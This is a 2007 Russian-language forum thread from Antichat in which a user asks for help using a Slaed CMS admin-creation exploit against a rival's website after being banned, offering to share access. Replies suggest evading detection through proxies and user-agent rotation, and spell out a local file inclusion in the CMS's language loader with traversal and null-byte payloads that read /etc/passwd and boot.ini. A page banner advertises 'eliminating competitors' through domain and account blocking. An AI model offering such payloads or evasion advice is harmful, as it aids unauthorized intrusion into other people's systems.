УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Веб-уязвимости
Slaed sql

Опции темы

Поиск в этой теме

Опции просмотра

Slaed sql

10.11.2007, 15:20

Ershik

Постоянный

Регистрация: 07.11.2007

Сообщений: 392

Провел на форуме:
1325167

Репутация: 100

Slaed sql

Совершенно случайно ко мне в руки попал приватный эксплоит для удаленного создания администратора в MySQL Slaed CMS
Начал тестировать на своем сайте, нормально.
Все работает.
Никаких предупреждении, что была попытка атаки не поступалала, и в логах не записывалось.
Перешел на портал неприятеля(очень сильно мешает)
Начал тестировать: и тут меня попросили пройти лесом, якобы была попытка атаки и пр. вообщем, автобан дали.
Как это обойти?
Сплоит недавный, выпущен на этой недели.
Сможете помочь проникнуть в систему, поделюсь задаром

Не туда тему отпостил, только сейчас заметил, модераторы, пожалуйста перенесите

Последний раз редактировалось Ershik; 10.11.2007 в 15:26..

11.11.2007, 11:53

blackybr

♠ ♦ ♣ ♥

Регистрация: 18.05.2006

Сообщений: 1,828

Провел на форуме:
8042357

Репутация: 3742

Отправить сообщение для blackybr с помощью ICQ

Отправить сообщение для blackybr с помощью AIM

Отправить сообщение для blackybr с помощью Yahoo

Если сплоит не юзает списки проксиков и не меняет юзер агенты, то вполне могут и палить количество запросов.. по некоему идентификатору..

__________________

Привет! Меня зовут Джордж, и я хотел бы рассказать вам про реинкарнацию (ц) 2x2

11.11.2007, 13:12

The_HuliGun

Участник форума

Регистрация: 19.05.2007

Сообщений: 228

Провел на форуме:
4325663

Репутация: 240

Отправить сообщение для The_HuliGun с помощью ICQ

Скачал последнюю версию с оффсайта Slaed CMS. Кинулся в глаза код в файле function/sources.php:

PHP код:


		
			
function get_lang($module="") {

    global $multilingual, $currentlang, $language, $user_cookie_t;

    if (isset($_REQUEST['newlang']) && $multilingual == "1") {

        if (file_exists("language/lang-".$_REQUEST['newlang'].".php")) {

            setcookie("lang", $_REQUEST['newlang'], time() + intval($user_cookie_t));

            require_once("language/lang-".$_REQUEST['newlang'].".php");

Вызов функции get_lang идет в файле index.php,

PHP код:


		
			
require_once("function/function.php");

get_lang();

Поетому, при magic_quotes_gpc = off есть возможность заюзать локальный инклуд

Код:

http://[targethost]/index.php?newlang=../../../../../../../../../../etc/passwd%00

Попробуй, может поможет.

11.11.2007, 20:05

blackybr

♠ ♦ ♣ ♥

Регистрация: 18.05.2006

Сообщений: 1,828

Провел на форуме:
8042357

Репутация: 3742

The_HuliGun в данном случае нельзя.
через такую конструкцию

Код:

language/lang-".$_REQUEST['newlang'].".php

в newlang можно передать локальные фвайлы из папки language, которые наячинаются с lang- =)) . фолдеры через нее не передадутся. можешь проверить на локалхосте

__________________

Привет! Меня зовут Джордж, и я хотел бы рассказать вам про реинкарнацию (ц) 2x2

11.11.2007, 23:30

[Raz0r]

Members of Antichat - Level 5

Регистрация: 25.02.2007

Сообщений: 495

Провел на форуме:
3244717

Репутация: 1980

Отправить сообщение для [Raz0r] с помощью ICQ

blackybr, я тоже сперва хотел написать, что инклуда на самом деле нет, но когда я проверил на локалхосте, то все отлично работало. Так что проверь сам и убедись =) Попробуй так:
http://localhost/slaed/html/?newlang=/../../index
The_HuliGun +1

12.11.2007, 14:10

Ershik

Постоянный

Регистрация: 07.11.2007

Сообщений: 392

Провел на форуме:
1325167

Репутация: 100

На сайте не прокатило...
Как мне сказали в личке, обнаружение атаки идет по той причине,что ведуться логи администратора...

13.11.2007, 08:27

The_HuliGun

Участник форума

Регистрация: 19.05.2007

Сообщений: 228

Провел на форуме:
4325663

Репутация: 240

Цитата:

Конечно будет работать, не знаю что тебя здесь удивило? Хотя есть одна особенность, как вы поняли, инклуд проходит через несуществующую папку. Например если инклудить

Код:

?newlang=not_exist/../../../boot.ini%00

Тогда получаем путь

Код:

language/lang-not_exist/../../../boot.ini%00

И по сути папка lang-not_exist на системе не существует, а инклуд проходит. В свое время меня тоже мучил вопрос о инклуде через несуществующую папку, и я заметил характерную вещь для *nix систем: если иклудить с %00 в конце тогда все инклудится прекрасно, если без %00 тогда инклудить не хочет.